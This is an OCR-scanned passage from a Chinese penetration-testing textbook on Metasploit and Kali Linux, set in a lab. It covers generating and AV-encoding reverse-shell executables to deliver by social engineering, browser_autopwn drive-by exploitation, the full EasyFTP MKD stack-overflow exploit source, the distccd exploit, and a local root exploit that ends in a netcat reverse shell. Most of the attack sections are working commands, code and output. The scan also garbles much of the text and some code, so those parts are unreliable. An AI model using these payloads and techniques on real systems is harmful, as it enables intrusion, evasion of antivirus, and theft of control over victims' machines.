[*] Adding User: btuser to local group 'Remote Desktop Users' 

[*] Adding User: btuser to local group 'Administrators' 

[*] You can now login with the created user 

[*] For cleanup use command: run multi console command -rc 

/root/.msf3/logs/scripts/getgui/clean up . 20101116.3447.rc 

现在 ， 我 们 可 通过 rdesktop 程序 登录 目标 主机 。 我 们 新 建 一 个 终 
端 窗口 ， 并 在 其 中 输入 下 述 指令 。 


# rdesktop 192.168.0.7:3389 

请 注意 : MROABE T HEIR ZAR, SL xS GT 
建 任何 账号 ， 直 接 执行 run getgui -e 命令 启用 远程 桌面 就 可 以 了 。 男 
外 ， 在 完成 渗透 工作 以 后 ， 记 得 要 在 Meterpreter shell 里 使 用 
getgui/clean up 脚本 程序 ， 以 清理 痕迹 。 

如 果 目 标 网 络 不 可 从 外 部 直接 访问 ， 那 么 应 该 采取 那些 手段 进 一 
步 渗 透 该 网 络 呢 ? 

Metasploit 能 够 通过 跳板 进行 操作 。 您 可 通过 
routeaddtargetSubnettargetSubnetMask SessionId 的 指令 ， 将 某 个 会 话 指 
定 为 跳板 。 此 处 SessionId 指 代 已 经 建立 的 Meterpreter SiG ( 即 跳板 网 
X) ，targetsubnet 参 数 指 代 下 一 步 需要 测试 的 网 段 〈《 如 果 被 攻陷 的 主 
机 是 双 网 设备 ， 则 可 以 是 它 的 另 一 个 网 段 ) 。Metasploit 会 通过 跳板 转 
发 指定 的 网 络 流 量 ， 这 样 就 可 以 继续 渗透 、 测 试 那 些 无 法 直接 访问 到 
的 网 络 设备 。 转 发 流量 的 主机 ， 就 是 通常 所 说 的 “跳板 ?下 “立足 点 ”。 

场景 4 

上 壕 案 例 演示 了 Metasploit 框 架 利用 被 测 主机 的 远程 漏洞 的 具体 方 
法 。 那 么 如 何 利用 客户 端 程 序 的 漏洞 (client-side exploitation) YE? 就 
此 问题 ， 本 文 将 以 渗透 测试 人 员 的 角度 ， 通 过 典型 案例 介绍 Metasploit 
在 利用 客户 端 程序 的 漏洞 方面 的 角色 ， 帮 助 读者 了 解 它 的 灵活 性 和 强 
大 功能 。 

生成 后 门 程序 

Metasploit 的 msfpayload 工具 能 够 生成 可 单独 运行 的 、 执 行 指 定 
Metasploit payload 的 后 门 程序 。 如 果 只 能 采取 社会 工程 学 手段 对 目标 进 
行 渗透 ， 那 么 这 种 手段 就 真是 救命 稳 草 了 。 在 本 例 中 ， 我 们 将 生成 一 
个 带 有 reverse shell payload 的 可 执行 文件 ， 然 后 把 它 发 给 目标 人 物 ， 诱 
使 他 /她 执行 这 个 文件 。msfpayload 程 序 可 以 生成 多 种 语言 的 程序 ， 输 
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如 需 启动 msfpayload 工 具 ， 可 在 您 的 shell 中 执行 下 述 指令 。 

# msfpayload -h 

上 述 指 令 将 会 显示 它 的 使 用 说 明 ， 并 列 出 所 有 可 用 的 payload。 它 
的 指令 格式 和 MSFCLI 非 常 相似 。 现 在 ， 我 们 通过 下 述 指令 创建 一 个 带 
有 reverse shell payload 的 可 执行 程序 ° 

#  msfpayload | windows/shell reverse tcp LHOST=192.168.0.3 
LPORT-33333 O 


#  msfpayload —Xwindows/shell reverse tcp LHOST=192.168.0.3 
LPORT-33333 X 

>/tmp/poker.exe 

Created by msfpayload (http://www.metasploit.com). 

Payload: windows/shell_reverse_tcp 

Length: 314 

Options: LHOST=192.168.0.3, LPORT=33333 

这 样 ， 我 们 就 生成 了 自己 的 后 门 程序 。 在 把 它 发 送 到 受害 人 或 目 
标 之 前 ， 您 必须 在 MSFConsle 里 使 用 multihandler 做 好 服务 端的 准备 ， 
以 便 它 可 受理 可 执行 文件 连 入 本 机 的 请 求 。 这 时 候 ， 要 使 multi/handler 
的 配置 和 msfpayload 在 创建 程序 时 的 配置 相 匹配 。 


msf > use exploit/multi/handler 


msf exploit(handler) > set PAYLOAD windows/shell reverse tcp 
PAYLOAD => windows/shell reverse tcp 


msf exploit(handler) > show options 


msf exploit(handler) > set LHOST 192.168.0.3 


LHOST => 192.168.0.3 

msf exploit(handler) > set LPORT 33333 

LPORT => 33333 

msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.3:33333 

[*] Starting the payload handler... 

现在 ， 我 们 可 以 把 准备 好 的 Windows 可 执行 文件 通过 社会 工程 欺骗 
方法 发 送 给 日 标 机 絮 ， 然 后 等 每 对方 运行 。 

[*] Command shell session 2 opened (192.168.0.3:33333 -> 

192.168.0.7:1053) at Wed Nov 17 04:39:23 +0000 2010 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings wsalesdept Desktop» 

如 有 果 在 MSFConsole YEI f Efe. WRH A HEAL A HES 
reverse shell ， 我 们 成 功 地 连接 到 了 被 测 主机 的 shell， 圆 满 地 完成 了 任 
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Metasploit 生 成 的 文件 能 否 规避 杀毒 软件 的 检测 ? 

有 很 多 种 方法 可 以 规避 杀毒 软件 的 检测 ， 本 文 只 介绍 其 中 的 一 
种 。 我 们 可 使 用 /usr/bin/msfencode 目 好 下 的 msfencode 工 具 ， 对 可 执行 
文件 进行 保护 性 封装 。 在 使 用 msfpayload 程序 生成 可 执行 文件 时 ， 使 
用 管道 命令 把 文件 内 容 传 给 msfencode 再 生成 最 终 文件 。 例 如 ， 下 述 指 
& EHE BUT A reverse shell 的 可 执行 文件 ， 并 对 文件 进行 保护 性 封装 : 
msfpayload windows/ shell/reverse_tcp LHOST=192.168.0.3 
LPORT=32323 R | msfencode -e x86/shikata ga nai -t exe >/tmp/tictoe ° 在 
规避 检测 方面 ，staged payload 的 成 功率 大 于 inlinepayload 。 

E MD, ea Di LU H 


在 测试 较为 安全 的 企业 网 络 时 ， 渗 透 人 员 往 往 不 知 从 何 处 入 手 。 
在 这 种 情况 下 ， 以 使 用 电子 设备 的 人 员 为 目标 ， 或 以 员工 为 首要 目标 
开展 社会 工程 学 攻击 可 能 是 唯一 的 方向 。 本 例 将 使 用 Metasploit 框架 的 
客户 端 漏 洞 利 用 模板 ， 以 演示 基于 技术 手段 的 社会 工程 学 攻击 。 下 面 
将 介绍 一 款 先 进 的 辅助 工具 Browser autopwn。 在 目标 人 员 访 问 它 
构建 的 恶意 URL 的 情况 下 ， 它 能 够 识别 出 被 测 主机 的 浏览 右 类 型 ， 并 
根据 识别 结果 自动 从 框架 中 选用 针对 该 浏览 絮 的 exploit 程 序 对 浏览 器 发 
起 攻击 。 有 天 的 指令 及 运行 结果 如 下 。 


msf > use auxiliary/server/browser autopwn 


msf auxiliary(browser autopwn) > show options 


msf auxiliary(browser autopwn) » set LHOST 192.168.0.3 

LHOST => 192.168.0.3 

msf auxiliary(browser autopwn) » set SRVPORT 80 

SRVPORT => 80 

msf auxiliary(browser autopwn) » set SRVHOST 192.168.0.3 

SRVHOST => 192.168.0.3 

msf auxiliary(browser autopwn) > set URIPATH / 

URIPATH => / 

msf auxiliary(browser_autopwn) > run 

[*] Auxiliary module execution completed 

[*] Starting exploit modules on host 192.168.0.3... 

[*] E 

[*] Starting exploit multi/browser/firefox escape retval with payload 
generic/ shell reverse tcp 

[*] Using URL: http://192.168.0.3:80/Eem9cKUIFvW 


[*] Server started. 


[*] Starting exploit multi/browser/java calendar deserialize with 
payload java/meterpreter/reverse tcp 

[*] Using URL: http://192.168.0.3:80/s98jmOiOtmv4 

[*] Server started. 

[*] Starting exploit multi/browser/java trusted chain with payload 
java/ meterpreter/reverse tcp 

[*] Using URL: http://192.168.0.3:80/6Bk Y 9uM23b 

[*] Server started. 

[*] Starting exploit multi/browser/mozilla compareto with payload 
generic/shell_reverse_tcp 

[*] Using URL: http://192.168.0.3:80/UZOI7Y 

[*] Server started. 

[*] Starting exploit multi/browser/mozilla navigatorjava with payload 
generic/ shell reverse tcp 

[*] Using URL: http://192.168.0.3:80/jRwIT67KIK6gJE 


[*] Starting exploit windows/browser/ie createobject with payload 
windows/meterpreter/reverse tcp 

[*] Using URL: http://192.168.0.3:80/Xb9Cop7VadNu 

[*] Server started. 

[*] Starting exploit windows/browser/ms03 020 ie objecttype with 
payload windows/meterpreter/reverse tcp 

[*] Using URL: http://192.168.0.3:80/rkd0X4Xb 


[*] Server started. 


[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 


[*] Starting handler for generic/shell_reverse_tcp on port 6666 


[*] Started reverse handler on 192.168.0.3:3333 

[*] Starting the payload handler... 

[*] Starting handler for java/meterpreter/reverse tcp on port 7777 

[*] Started reverse handler on 192.168.0.3:6666 

[*] Starting the payload handler... 

[*] Started reverse handler on 192.168.0.3:7777 

[*] Starting the payload handler... 

[*] --- Done, found 15 exploit modules 

[*] Using URL: http://192.168.0.3:80/ 

[*] Server started. 

一 旦 目标 人 员 访 问 了 恶意 URL (http//192.168.0.3) ， 程 序 将 会 识 
别 出 他 的 /她 的 浏 咒 器 ， 并 执行 相应 的 漏洞 利用 程序 。 在 此 以 后 ， 我 们 
就 可 以 通过 客户 端 利用 程序 渗透 目标 主机 © 

[*] Request / from 192.168.0.7:1046 

[*] Request " from 192.168.0.7:1046 

[*] Request y? 
sessid- V2luZG93czpY UDpTUDI6ZW4tdXM6eDg2Ok1TSUUGNi4wO1N 
QMjo 963d' from 192.168.0.7:1046 

[*] JavaScript Report: Windows: XP:SP2:en-us:x86: MSIE:6.0;SP2: 

[*] Responding with exploits 

[*] Handling request from 192.168.0.7:1060... 

[*] Payload will be a Java reverse shell to 192.168.0.3:7777 from 
192.168.0.7... 

[*] Generated jar to drop (4447 bytes). 

[*] Handling request from 192.168.0.7:1061... 


[*] Sending Internet Explorer COM CreateObject Code Execution 
exploit HTML to 192.168.0.7:1068... 

[*] Request ' from 192.168.0.7:1069 

[*] Request / from 192.168.0.7:1068 

[*] Request ' from 192.168.0.7:1069 

[*] Sending EXE payload to 192.168.0.7:1068... 

[*] Sending stage (749056 bytes) to 192.168.0.7 

[*]  Meterpreter session 1 opened  (192.168.0.3:3333 - 
>192.168.0.7:1072) at Thu Nov 18 02:24:00 +0000 2010 

[*] Session ID 1 (192.168.0.3:3333 -> 192.168.0.7:1072) processing 
InitialAutoRunScript 'migrate -f' 

[*] Current server process: hzWWoLvjDsKujSAsBVykMTiupUh.exe 
(4052) 

[*] Spawning a notepad.exe host process... 

[*] Migrating into process ID 2788 


[*] New server process: notepad.exe (2788) 


msf auxiliary(browser_autopwn) > sessions 


Active sessions 


Id ‘Type Information 


Connection 


1 meterpreter x86/win32 CUSTDESK\Momin Desktop @ 
CUSTDESK 
(ADMIN) 192.168.0.3:3333 -> 192.168.0.7:1072 


msf auxiliary(browser autopwn) > sessions -i 1 

[*] Starting interaction with 1... 

meterpreter > getuid 

Server username: CUSTDESK\Momin Desktop 

上 述 信息 表明 ， 我 们 已 经 利用 客户 端的 攻击 程序 成 功 渗透 到 目标 
主机 。 应 当 指 出 的 是 ， 这 些 Web 浏 览 右 的 exploit 程 序 ， 每 个 都 只 能 对 特 
定 版 本 的 特定 浏览 器 (例如 Intenet Explorer、Firefox、Opera 等 ) 进行 
攻击 。 


本 区 将 围绕 exploit 开 发 的 核心 问题 进行 讨论 ， 通 过 生动 的 例子 演示 使 
用 Metasploit 框 染 的 数据 库 构 造 exploit 的 关键 步 又。 然而 ， 在 使 用 这 个 
框架 编写 自己 的 exploit 程序 之 前 ， 您 需要 理解 一 些 Ruby 编 程 的 基础 知 
识 。 男 外 ， 您 还 需要 掌握 逆向 工程 的 基本 技能 ， 并 切实 理解 漏洞 挖 据 
工具 (如 fuzzers 和 debuggers) 的 使 用 方法 。 只 有 兼备 上 壕 技 能 ， 您 才 
能 按 步 束 班 地 构造 exploit 程 序 。 本 市 的 内 容 仅 作为 有 关 人 研发 的 简略 介 
绍 ， 在 完整 程度 上 可 能 存在 欠缺 。 

本 例 将 针对 EasyFTP Server (1.7.0.11 以 下 版 本 ) 编写 利用 MKD 
Command Stack Buffer Overflow 漏洞 的 shellcode 程序 ， 它 能 够 反映 编写 
RP X iin H exploit 的 大 致 方法 。 您 可 以 针对 其 他 FTP 服 务 端 程序 的 相似 
漏洞 ， 举 一 反 三 地 编写 exploit 程 序 。 这 个 exploit 的 源 代 人 码 的 下 载 网 址 


是 /usr/share/metasploit- 


framework/modules/exploits/windows/ftp/easyftp mkd fixret.rb ° 
UH 
# $Id: easyftp mkd fixret.rb 9935 2010-07-27 02:25:15Z jduck $ 
UH 


文件 中 的 header 部 分 描述 了 这 个 exploit 的 文件 名 、 修 订 编 号 、 创 建 


日 期 和 时 间 。 


USe. 


HH 
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit 


# Framework web site for more information on licensing and terms of 


# http://metasploit.com/framework/ 

HH 

require 'msf/core' 

在 exploit 的 开头 部 分 ， 自 和 完 要 对 MSF 核 心 库 进 行 初 始 化 。 

class Metasploit3 < Msf::Exploit::Remote 

上 述 代 码 所 用 的 Exploit 子 类 定义 了 远程 TCP 连 接 所 需 的 各 种 选项 和 


方法 (内 置 画 数 ) , &fERHOST ^ RPORT ` Connect() ` Disconnect() ` 
SSLO 等 。 


Rank = GreatRanking 
上 述 代码 根据 需求 和 使 用 的 频率 分 配 等 级 。 
include Msf::Exploit::Remote::Ftp 
上 述 代 码 中 的 Ftp 子 类 用 于 和 FTP 服 务 端 建立 连接 。 
def initialize(info = {}) 
super(update info(info, 
'Name' => 'EasyFTP Server <= 1.7.0.11 MKD Command 
Stack Buffer Overflow', 
'Description' => %q{ 
This module exploits a stack-based buffer overflow in 
EasyFTP Server 1.7.0.11 


and earlier. EasyFTP fails to check input size when parsing 
'MKD' commands, which 
leads to a stack based buffer overflow. 
NOTE: EasyFTP allows anonymous access by default. 
However, in order to access the 
'MKD' command, you must have access to an account that can 
create directories. 
After version 1.7.0.12, this package was renamed "UplusFtp". 
This exploit utilizes a small piece of code that I've referred to as 
fixRet. 
This code allows us to inject of payload of ~~500 bytes into a 
264 byte buffer by 
fixing' the return address post-exploitation. See references for 
more information. 
b 
'Author' ==> 
[ 
'x90c', # original version 
jduck, # port to metasploit / modified to use fix-up stub 
(works with bigger payloads) 
]， 
License => MSF LICENSE, 
"Version => '$Revision: 9935 $', 
' References' => 
[ 
['OSVDB', '62134' ], 
[URL'’, 'http://www.exploit-db.com/exploits/12044/ ], 


['URL'', 'http://www.exploit-db.com/exploits/14399/'] 
], 
上 述 代 码 描述 了 exploit 的 音 规 信息 ， 并 且 明 确 了 参考 的 资料 。 
'‘DefaultOptions' => 
{ 
'EXITFUNC' => 'thread' 
上 述 代 码 指定 了 exploit 在 结束 时 的 销毁 方式 。 


in 

Privileged' => false, 
'Payload' => 

{ 


‘Space’ => 512, 
'BadChars' => "\x00\xOa\x0d\x2f\x5c", 
'DisableNops' => true 
js 
上 述 代码 为 shellcode 预 留 了 512 字 节 空 间 ， 列 出 应 终止 paylod 的 坏 
字符 ， 并 禁止 使 用 NOP 填 充 payload ° 


Platform' => 'win', 


"Targets' => 
[ 
[ Windows Universal - v1.7.0.2', { 'Ret' => 
0x004041ec } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.3', { 'Ret' => 
0x004041ec } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.4', { 'Ret' => 
0x004041dc } J, # call ebp - from ftpbasicsvr.exe 
[ "Windows Universal - v1.7.0.5', { 'Ret' => 


0x004041a1 } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.6', { 'Ret' => 
0x004041a1 } J, # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.7', { 'Ret' => 
0x004041a1 } ], # call ebp - from ftpbasicsvr.exe 
[ "Windows Universal - v1.7.0.8', { 'Ret' => 
0x00404481 } |], # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.9', { 'Ret' => 
0x00404441 } ], # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.10', { 'Ret' => 
0x00404411 } |], # call ebp - from ftpbasicsvr.exe 
[ Windows Universal - v1.7.0.11', { 'Ret' => 
0x00404411 } |], # call ebp - from ftpbasicsvr.exe 
]， 
'DisclosureDate' => 'Apr 04 2010', 
'DefaultTarget' => 0)) 
上 述 代 码 定 义 了 操作 系统 的 平台 类 型 ， 定 义 了 Easy FIPServer 
(1.7.0.2~1.7.0.11) 的 10 个 〈 序 号 0~9) 有 缺陷 的 版 本 ;根据 版 本 的 
不 同 ， 又 定义 了 可 执行 程序 (ftpbasicsvr. exe) 不 同 的 返回 地 址 。 另 
外 ， 它 声明 了 exploit 的 发 布 日 期 ， 以 及 攻击 目标 的 默认 版 本 号 
(1.7.0.2) ° 
end 
def check 


connect 


disconnect 
if (banner =~ /BigFoolCat/) 
return Exploit::CheckCode::Vulnerable 


end 
return Exploit:: CheckCode::Safe 

end 

Ext f B3 "RB checkQ ES RH FAW EUER E Lo 6 ETE VA del e 

def make nops(num); "C" * num; end 

E xtü fC 83 5E X. H9 ZZ ES 2 n] ^E p num ^ NOP ， 主 要 用 于 规避 
IDS/IPS/AV 检 测 。 虽 然 这 个 程序 确实 使 用 NOP 作 为 规避 检测 的 手段 ， 
但 是 通 第 情况 下 这 种 方式 并 不 会 奏效 。 所 以 ， 除 非 有 特别 好 的 理由 ， 
否则 不 要 使 用 这 种 技术 。 人 简单 起 见 ， 在 写 exploit 模 板 的 时 候 保留 了 这 段 
代码 。 


def exploit 


connect login 
# NOTE: 
# This exploit jumps to ebp, which happens to point at a partial 
version of 
# the 'buf' string in memory. The fixRet below fixes up the code 
stored on the 
# stack and then jumps there to execute the payload. The value in esp 
is used 
# with an offset for the fixup. 
fixRet asm = %q{ 
mov edi,esp 
sub edi, Oxfffffe10 
mov [edi], Oxfeedfed5 
add edi, Oxffffff14 
jmp edi 


fixRet = Metasm::Shellcode.assemble(Metasm::1a32.new, 

fixRet asm).encode string 

buf =" 

上 述 代 码 将 返 同 地 址 调整 为 payload 的 启 始 地 址 。 从 技术 上 来 说 ， 
它 解决 了 堆栈 寻 址 (stack addressing) 的 问题 。 

print_status("Prepending fixRet...") 

buf << fixRet 

buf << make nops(0x20 - buf.length) 

exploit 缓 冲 区 的 开头 部 分 是 经 编码 处 理 过 的 返回 地 址 和 随机 个 NOP 

已 人 。 

print. status(" Adding the payload...") 

buf «« payload.encoded 

Ext BA EBS 11 BH [RITE shellcodez/] ASHLYNN exploit ° 

# Patch the original stack data into the fixer stub 

buf[10, 4] = buf[268, 4] 

print. status("Overwriting part of the payload with target 

address...") 

buf[268,4] = [target.ret].pack( V") # put return address 

@ 268 bytes 

调整 栈 里 的 数据 ， 修 改 返 回 地 址 为 shellcode 的 地 址 。 这 样 利 用 栈 的 
特性 ， 程 序 在 执行 过 程 中 将 自动 跳 转 到 shell 的 地 址 。 

print_status("Sending exploit buffer...") 

send cmd( ['MKD', buf] , false) 

最 后 ， 我 们 借助 服务 端 程序 里 存在 漏洞 的 MKD 指 令 (这 是 一 个 经 
过 FTP 身 份 验 证 之 后 才能 使 用 的 指令 ) ， 把 构造 好 的 缓冲 区 数据 发 送 给 
指定 主机 。 精 心 构造 的 buf 数 据 可 以 通过 Easy-FTP 服务 端 程序 的 MKD 
命令 触发 基于 栈 结构 的 缓冲 区 次 出 漏洞 ， 继 而 执行 我 们 的 payload， 完 


成 对 目标 系统 的 漏洞 利用 。 之 后 ， 我 们 还 要 通过 下 述 代 码 天 财 FTP 连 
接 。 
handler 
disconnect 
end 
end 
Metasploit 搭 载 了 许多 实用 工具 。Win32 下 的 msfpescan 程 序 和 Linux 
下 的 msfelfscan， 都 可 用 于 查找 指定 程序 的 返回 地 址 。 例 如 ， 要 查找 指 
定 程序 的 返回 地 址 ， 可 使 用 指令 : #./msfpescan -p targetapp.ext ° 


9.4 总 结 


本 章 介 绍 了 利用 目标 漏洞 的 几 个 关键 点 。 开 篇 首先 展示 了 漏洞 检 
测 的 全 过 程 ， 并 强调 了 有 关 工 作 所 需 的 知识 和 技巧 。 功 能 强大 的 Kali 
Linux 是 漏洞 评估 工作 的 利器 。 本 章 接 下 来 列举 出 了 发 布 各 种 已 公布 漏 
洞 和 exploit 程 序 的 网 站 。 本 章 的 最 后 篇 幅 沉 示 了 高 级 漏洞 利用 工具 集 
Metasploit 框 架 。 文 中 借助 大 量 实例 ， 介 绍 了 通过 各 种 利用 漏洞 获 
取 被 测 目标 控制 权 的 方法 。 此 外 ， 本 文 还 深入 浅 出 地 介绍 了 编写 漏洞 
利用 代码 的 各 个 环节 ， 前 述 了 exploit 程 序 的 基本 框架 和 编写 全 略 。 

下 一 章 将 会 介绍 提升 权限 的 各 种 工具 和 技术 。 


10 提 


上 一 章 介绍 了 利用 已 识别 的 漏洞 进行 漏洞 映射 的 有 关 流 程 。 利 用 
漏洞 的 最 终 目的 是 获取 被 测 系统 的 最 高 权限 ， 即 Windows 操 作 系统 中 管 
理 员 账 户 的 权限 ， 或 UNIX 操 作 系统 中 root 账 户 的 权限 。 


Pr AE ll FB d d] ZED SS PEFR ^ ETC BJ SE Jot BEER 
用 漏洞 的 手段 提高 自身 的 操作 权限 。 

提升 权限 的 方式 分 为 两 类 。 

e 纵向 提 权 (vertical privilege escalation) : 如 果 低 权限 角色 (AY 
用 户 ) 能 够 获得 高 权限 角色 的 权限 ， 则 这 种 提 权 束 可 称 为 纵向 提 权 。 
例如 ， 如 果 在 提 权 之 后 ， 内 容 管 理 系统 (CMS) 的 某 个 用 户 能 够 使 用 
管理 员 的 功能 ， 那 么 这 种 提 权 就 是 纵 同 提 权 。 

e 横 问 提 权 (horizontal privilege escalation) : 如 果 获 取 了 同 级 别 
角色 的 权限 ， 这 种 提 权 就 属于 横向 提 权 。 例 如 ， 如 果 在 网 上 银行 里 ， 
HP A 获取 了 用 户 B 的 权限 ， 他 可 以 荐 用 户 B 进 行 操作 ， 那 么 这 种 提 


权 束 属于 横 癌 提 权 。 
越权 提升 权限 的 攻击 天 量 ， 大 体 可 分 为 以 下 几 种 。 
e 利用 本 地 漏洞 。 


e 利用 目标 系统 上 的 配置 缺陷 。 例 如 ， 如 果 home 目 孙 可 被 其 他 用 
户 访问 ， 那 么 攻击 人 员 可 束 可 以 使 用 目 永 里 的 SSH 私 有 密 钥 访问 其 他 主 
HL ° 

e 利用 目标 系统 的 弱 密 码 。 

e 咒 探 网 络 流量 以 捕获 他 人 的 用 户 名 和 密码 。 

e 伪造 网 络 数据 包 。 

本 章 不 会 讨论 利用 配置 缺陷 的 渗透 方法 。 


这 一 小 五， 我 们 将 使 用 本 地 漏洞 的 利用 程序 (local exploit) 提升 
权限 。 
我 们 的 洲 示 环境 如 下 。 


e IP 7j192.168.56.102, izÍf7jMetasploitable 2 的 虚拟 机 充当 被 测 主 
机 。 

e IP 为 192.168.56.101， 运 行 Kali Linux 的 虚拟 机 充当 测试 平台 。 

首先 ， 我 们 要 扫 朱 被 测 主机 上 的 网 络 服务 。 本 文通 过 下 述 指令 进 
行 端口 扫描 。 

nmap —p- 192.168.56.102 

我 们 通过 -p- 选 项 ， 令 Nmap 扫 描 被 测 主 机 的 所 有 端口 a~ 
65535) 。 

在 扫描 结束 之 后 ，Nmap 会 列 出 所 有 开放 的 端口 ( 见 图 10.1) 。 


ost is up (0.0098s latency). 
ot shown: 65505 closed ports 
STATE SERVICE 


open 
open 
open 
open 
open 
open 
open 
open 


open 
open 
open 


e 


然后 ， 我 们 要 确定 Metasploit 中 是 否 有 相应 的 exploit 程 序 ( 见 


10.2) 。 


上 述 信 息 表 明 ，Metasploit 确 有 攻击 distccd 服 务 漏洞 的 exploit 程 


序 。 
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图 10.1 
S 可 被 用 来 执行 任意 指 
个 服务 是 一 种 分 布 式 的 编译 工具 ， 可 协调 多 台 


主机 协助 完成 大 


接 下 来 ， 我 们 通过 下 述 指令 利用 这 个 漏洞 〈 见 图 10.3) 。 


msf> Search distccd 


Matching Modules 


Name Disclosure Date Rank Description 


Command Execution 


图 10.2 


[nsf» use exploit/unix/misc/distcc exec 

msf exploit(distcc exec) » set RHOST 192.168.56.102 
RHOST => 192.168.56.102 

msf exploit(distcc exec) » exploit 


] Started reverse double handler 
] Accepted the first client connection... 
] Accepted the second client connection... 
] Command: echo AA3PfhlQvFR969Be; 
] Writing to socket A 

] Writing to socket B 

] Reading from sockets... 
] Reading from socket B 

] B: "AA3PfhlQvFR969BeVr^n" 

] Matching... 

] A is input... 

] Command shell session 2 opened (192.168.56.101:4444 -» 192.168.56.102:60018) at 
2014-02-06 10:00:49 «0700 


一 一 一 一 一 一 一 一 一 一 一 一 


whoami 
daemon 


图 10.3 

我 们 通过 这 个 exploit 利 用 了 该 服务 的 漏洞 。 而 后 ， 我 们 通过 操作 系 
统 的 指令 看 到 已 经 获取 到 的 权限 是 daemon 的 权限 。 

在 进一步 操作 之 前 ， 我 们 应 到 获取 被 测 主机 的 详细 信息 。 现 在 ， 
我 们 通过 下 述 指令 得 看 被 测 主机 的 内 核 版 本 。 

uname —r 

通过 上 述 指令 ， 我 们 了 解 到 目标 主机 的 内 核 是 2.6.24-16-server。 

我 们 搜索 exploit-db 的 资料 库 ， 发 现 某 个 exploit 程序 

(http://www.exploitdb.com/exploits/8572/) 可 将 我 们 的 权限 提升 为 root 


权限 。 下 一 步 ， 我 们 在 测试 主机 上 保存 exploit 程 序 ， 然 后 使 被 测 主机 从 
Qu MCN s 。 有关 指 令 如 图 10.4 所 示 。 
在 被 测 主机 上 下 载 exploit 之 后 ， 我 们 在 被 测 主机 上 使 用 gcc 指 令 编 


TÉexploit ° 


gcc privs.c -0 privs 

现在 ， 我 们 制备 好 了 exploit 程 序 。 在 分 析 了 exploit 的 源 代 码 之 后 ， 
我 们 发 现 这 个 exploit 程 序 需 要 在 命令 行 里 使 用 udevd netlink socket 的 
PID (Process Identifier) 作为 参数 。 为 此 ， 我 们 使 用 下 壕 指令 获取 这 个 
PID 值 。 


et http://192.168.56.101/privs.c -0 privs.c 
--22:21:27-- http://192.168.56.101/privs.c 
=> "privs.c' 
Connecting to 192.168.56.101:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: 2,768 (2.7K) [text/x-csrc] 


OK .. 100% ^ 1.26 MB/s 

22:21:27 (1.26 MB/s) - "privs.c' saved [2768/2768] 
110.4 

cat /proc/net/netlink 

所 获 信息 如 图 10.5 所 示 。 
cat /proc/net/netlink 
sk Eth Pid Groups Rmem Wmem Dump Locks 
de30a800 0 0 00000000 0 0 00000000 2 
df91d400 4 0 00000000 0 0 00000000 2 
dd884800 7 0 00000000 0 0 00000000 2 
ddcO8600 9 0 00000000 0 0 00000000 2 
ddc04400 10 0 00000000 0 0 00000000 2 
de30ac00 15 0 00000000 0 0 00000000 2 
df86fa00 15 2390 00000001 0 0 00000000 2 
de317800 16 0 00000000 0 0 00000000 2 
df99e400 18 0 00000000 0 0 00000000 2 


图 10.5 
您 也 可 以 通过 单条 指令 获取 udev 服 务 的 PID ° 


ps aux | grep udev 


上 述 指令 的 输出 结 采 如 下 。 
root 2391 0.0 0.1 2216 660 ? S «S 21:06 0:01 / sbin /udevd -daemon 
即 ，udev 服 务 的 PID 是 2390 ° 
在 实际 的 渗透 测试 工作 之 中 ， 您 可 能 要 安装 一 台 内 核 与 被 测 主机 
元 全 相同 的 测试 主机 ， 以 测试 exploit 程 序 。 
从 被 测 主机 上 收集 的 信息 判断 ， 目 标 主机 上 安装 有 NetCat 程 序 。 成 
功 运行 exploit 程 序 之 后 ， 我 们 就 有 了 被 测 主机 的 root SUR ° 我 们 再 在 
被 测 主机 上 运行 netcat 程序 ， 让 它 反 癌 连 接 到 测试 主机 。 通 过 其 源 代 
码 可 知 ， 这 个 exploit 把 文件 名 为 run 的 可 执行 文件 当 作 其 payload。 所 
以 ， 我 们 需要 制备 这 个 payload 。 
echo '#!/bin/bash' > run 
echo '/bin/netcat -e /bin/bash 192.168.56.101 31337' >> run 
在 执行 payload 之 前 ， 我 们 还 要 在 测试 主机 上 启动 netcat 的 监听 服 
以 受理 被 测 主机 发 起 的 连接 。 
nc -vv -| -p 31337 
最 后 ， 我 们 在 被 测 主机 上 运行 下 述 指令 。 
Jprivs 2390 
此 后 ， 我 们 可 在 测试 主机 上 看 到 图 10.6 所 示 的 信息 。 


root@kali:~# nc -v -l -p 31337 

nc: listening on :: 31337 ... 

nc: listening on 0.0.0.0 31337 ... 

hc: connect to 192.168.56.101 31337 from 192.168.56.102 (192.168.56.102) 46060 [460 
60] 

whoami 

root 


v 


图 10.6 
通过 whoami 指 令 ， 我 们 可 看 到 已 经 成 功 提 升 目 身 权限 为 root 的 权 
BR e 


10.2 密码 攻击 


密码 是 当代 系统 验证 用 户 身 份 的 主要 手段 。 只 要 某 人 能 够 递交 正 
确 的 用 户 名 和 对 应 的 密码 ， 系 统 就 允许 这 个 人 登录 并 人 允许 他 使 用 该 账 
号 的 所 有 资源 。 

构成 酉 份 验证 的 要 到 可 分 为 三 大 类 。 

e 基于 所 知 (something you know) 。 这 类 认证 要 素 通 常 被 称 为 身 
份 验证 的 第 一 要 下 。 密 码 就 属于 这 类 要 素 。 理 论 上 来 说 ， 只 有 特定 秘 
密 的 持 有 人 才能 “知道 "有 天 秘密 。 然 而 不 邓 的 是 ， 这 类 信息 很 容易 外 
泄 ， 也 易于 被 他 人 获悉 。 因 此， 机 要 系统 应 当 采 取 其 他 方式 的 号 份 验 
证 方式 。 

e 基于 所 有 (somethingyouhave) 。 这 类 认证 要 素 通 常 被 称 为 身份 
验证 的 第 二 要 素 。 安 全 令 牌 、 门 禁 卡 等 都 属于 这 类 认证 要 素 。 疝 系统 
出 示 相 应 的 安全 持 有 物 后 ， 持 有 者 即 可 获得 登录 权 。 不 过 ， 持 有 物 

(信息 ) 可 被 复制 ， 所 以 这 种 身份 验证 方法 并 非 没有 缺陷 。 

